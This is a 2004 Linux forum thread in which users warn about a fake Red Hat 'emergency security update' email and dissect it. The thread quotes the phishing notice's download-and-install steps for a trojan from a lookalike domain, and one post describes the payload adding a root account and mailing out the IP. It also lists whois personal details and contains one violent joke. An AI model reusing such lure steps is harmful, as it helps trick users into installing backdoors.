Fedora Linux Support Community & Resources Center
  #1  
Old 24th October 2004, 11:17 PM
ewdi's Avatar
ewdi Offline
Retired Admin
 
Join Date: Jan 2004
Location: Penguin Land
Age: 63
Posts: 1,939
Fake Emails about Emergency Security Update

This is a WARNING, today i received an email from security@redhat.com containing emergency security patch notice. Please understand, that email DOES NOT come from REDHAT. it's from 2ens11.uta.edu mail server. I have contacted University of Texas at arlington (near where i live) about this malcious email.

Do not download and install the patch on that email.
www.fedora-redhat.com is not a redhat site, it's a site set up by this person to get you to download this file and install it on your system or server. The content of the file is unknown .

------------------------------------
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
° First download the patch from the Security RedHat mirror: wget http://www.fedora-redhat.com/fileuti...6.patch.tar.gz
° Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
° cd fileutils-1.0.6.patch
° make
° ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
---------------------------------------------------------------

This person who sent the email also registered the domain where you can download the FAKE patch

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Please look out for this kind of email as it could harm your system.
__________________
+ Visit My new blog
- [B]SlashGear US, SlashGear Japan, and
+Founder & Admin of www.fedoraforum.org

Follow me at http://twitter.com/ewdi

Laptop : MacBook Pro 2.4Ghz 4GB DDR, 20-inch iMac Aluminium/4GB RAM
  #2  
Old 24th October 2004, 11:27 PM
madpenguin Offline
Registered User
 
Join Date: Apr 2004
Location: Las Vegas
Age: 41
Posts: 14
Thanks Ewdi! This is good info...
__________________
+ Mad Penguin - Founder/Chief Technology Editor
+ FedoraForum.org - Administrator
  #3  
Old 24th October 2004, 11:40 PM
foolish's Avatar
foolish Offline
Retired Community Manager
 
Join Date: Feb 2004
Location: Aalesund, Norway
Age: 26
Posts: 1,888
This is scary, and facinating. What does the patch really do?
__________________
Sindre Pedersen Bjørdal || http://www.fedorasolved.org || Hardware Profile
- Please adhere to the FedoraForum Guidelines.
  #4  
Old 24th October 2004, 11:41 PM
sLydE Offline
Registered User
 
Join Date: Jul 2004
Age: 28
Posts: 23
hmmm...I might have an extra pc laying around that I could load up with fedora and see what happens when I install the patch...
__________________
Stroz.net
Doom Legacy Wiki
  #5  
Old 25th October 2004, 12:41 AM
Jman Offline
Registered User
 
Join Date: Mar 2004
Location: Minnesota, USA
Age: 27
Posts: 7,909
Several things make me suspicious about this.
  • The website is plainer than Red Hat or Fedora design
  • The website only lists this issue, aside from a couple links to home pages.
  • Red Hat does not refer to itself as RedHat on their website.
  • There is no fileutils package. ls and mkdir are in coreutils
  • The patch is a whopping 960 KB.
  • The patch has it's own makefile and huge binary file
  • The patch has something called a shell script compiler

There's no telling what this does, as it's binary. Do not install it.
  #6  
Old 25th October 2004, 12:45 AM
james_in_denver Offline
Registered User
 
Join Date: Oct 2004
Posts: 1,227
Yep,

very suspicious. looks like a Trojan horse.

Whoever did it could be in some pretty big legal trouble, especially since they are using the RedHat logo on the DL page, that's called trademark infringement.
  #7  
Old 25th October 2004, 01:24 AM
jcstille Offline
Registered User
 
Join Date: May 2004
Location: Raleigh, NC
Posts: 741
Good information. Can't wait to find out what it is though.
__________________
E-mail: jcstille@gmail.com
FedoraForum.org Administrator

Please read the Guidelines
So these are the people FedoraForum.org Here and their Blogs


My Blog <-Where I let you know whats going on
  #8  
Old 25th October 2004, 01:43 AM
h4d's Avatar
h4d Offline
Registered User
 
Join Date: Feb 2004
Location: Boston
Posts: 239
It's funny how the author even links to redhat.com and fedora.redhat.com

Code:
Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com
yet no direct link to the actual discussion of the vulnerability. hmmmmmm!
  #9  
Old 25th October 2004, 01:49 AM
v8s10blazer Offline
Registered User
 
Join Date: Sep 2004
Location: Moore, Oklahoma, South USA
Age: 28
Posts: 153
I say we track that son of a b***h down and beat him to death with his keyboard... Im in oklahoma city, so it wouldnt be a far drive for me muuahaha

-andy
  #10  
Old 25th October 2004, 02:55 AM
Bana's Avatar
Bana Offline
Retired Community Manager
 
Join Date: Feb 2004
Location: Austin, Texas
Age: 26
Posts: 581
Wow, this is quite scary, I don't think I've ever heard anything like this for Linux, thanks for the heads up.

Also: would bugzilla be a good place to report this kind of exploit?
__________________
http://coolhands.blogspot.com/
binarybana AT gmail.com
  #11  
Old 25th October 2004, 03:08 AM
sailor's Avatar
sailor Offline
Registered User
 
Join Date: Mar 2004
Location: San Antonio, Texas
Age: 55
Posts: 3,996
the source for the page had some server comments at the end of the html that indicate it maybe a geocities page?

<!-- text below generated by server. PLEASE REMOVE --><!-- Counter/Statistics data collection code --><script language="JavaScript" src="http://hostingprod.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.webhosting.yahoo.com/visit.gif?us1098669866" alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001524&t=1098669866" ALT=1 WIDTH=1 HEIGHT=1>
__________________
sailor
Fedora 16, Mac OSX Snow Leopard, Windows 7
Registered linux user #362635
****************************************

Last edited by sailor; 25th October 2004 at 03:10 AM.
  #12  
Old 25th October 2004, 03:49 AM
crackers's Avatar
crackers Offline
Retired Community Manager
 
Join Date: Feb 2004
Location: Seattle, WA, USA
Age: 56
Posts: 3,423
It's been pretty well dissected over at /.

The main payload creates a new user with root priviledges, makes sure ssh is running, mails the IP address to someone, then deletes it's work. It's very lame. We'll probably find out in the end that it's either some moron who actually thought he/she could get away with it or a student who is doing some study in OSS usage (or something) who's just as much a moron as the first type.

Either way, they weren't smart enough to cover their tracks very well and there's going to be some heads rolling...
__________________
Linux User #28251 (April '93)
Professional Java Geek :cool:
  #13  
Old 25th October 2004, 03:50 AM
tchung's Avatar
tchung Offline
FedoraNEWS.org Admin
 
Join Date: Feb 2004
Location: California, US
Posts: 561
This is from Red Hat Secuity Website - http://www.redhat.com/security/

23rd October 2004
Red Hat has been made aware that emails are circulating that pretend to come from the Red Hat Security Team. These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code. Official messages from the Red Hat security team are never sent unsolicited, are always sent from the address secalert@redhat.com, and are digitally signed by GPG. All official updates for Red Hat products are digitally signed and should not be installed unless they are correctly signed and the signature is verified. For more details see
http://www.redhat.com/security/team/key.html.

Please be aware NOT to install any package you can't trust!

Thomas
__________________
Thomas Chung
http://fedoraproject.org/wiki/ThomasChung

Last edited by tchung; 25th October 2004 at 04:25 AM.
  #14  
Old 25th October 2004, 05:12 AM
mike's Avatar
mike Offline
Retired Community Manager
 
Join Date: Feb 2004
Location: Salt Lake City, UT
Age: 45
Posts: 199
Here is the whois info:
Domain Name: FEDORA-REDHAT.COM
Registrar: MELBOURNE IT, LTD. D/B/A INTERNET NAMES WORLDWIDE
Whois Server: whois.melbourneit.com
Referral URL: http://www.melbourneit.com
Name Server: YNS1.YAHOO.COM
Name Server: YNS2.YAHOO.COM
Status: ACTIVE
Updated Date: 23-oct-2004
Creation Date: 23-oct-2004
Expiration Date: 23-oct-2005


And some domain info someone found on slashdot
Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com
__________________
Mike Basinger: mike@fedoraforum.org
Linux Registered User # 371887
"The hardest questions in life are the once worth answering."

Last edited by mike; 25th October 2004 at 05:16 AM.
  #15  
Old 25th October 2004, 05:15 AM
Finalzone's Avatar
Finalzone Offline
Community Manager
 
Join Date: Mar 2004
Location: Vancouver, Canada
Posts: 2,365
Another flaw the cracker forgot is to use rpm since Red Hat recommand update with that format via either yum or up2date. You will never read that Red Hat uses tar.gz to update the package.
__________________
Desktop CPU: AMD Phenom II(tm) X4 Processor 940 AM2+ - Memory: 8GB DDR2-RAM - GPU: Nvidia Geforce GTX 460 v2 - OS: Fedora 18 Spherical Cow x86-64 and Windows 7 Ultimate SP1 64-bit
Laptop Toshiba Satellite C650D - OS: Fedora 19 Schrödinger's Cat (preview release) x86-64 and Microsoft Windows 7 64-bit
Closed Thread

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
I can Send Emails But I cannot Receive Emails jmbiram Using Fedora 18 17th June 2008 11:05 PM
KDE 3.4(+) security update for FC3 u-noneinc-s Using Fedora 0 4th February 2006 07:08 AM
yum security update? derailed Using Fedora 6 19th January 2006 12:25 AM
security update using yum/apt kveaswaran Security and Privacy 5 16th August 2005 08:16 PM


Current GMT-time: 10:34 (Sunday, 19-05-2013)

TopSubscribe to XML RSS for all Threads in all ForumsFedoraForumDotOrg Archive
logo

All trademarks, and forum posts in this site are property of their respective owner(s).
FedoraForum.org is privately owned and is not directly sponsored by the Fedora Project or Red Hat, Inc.

Privacy Policy | Term of Use | Posting Guidelines | Archive | Contact Us | Founding Members

Powered by vBulletin® Copyright ©2000 - 2012, vBulletin Solutions, Inc.

FedoraForum is Powered by RedHat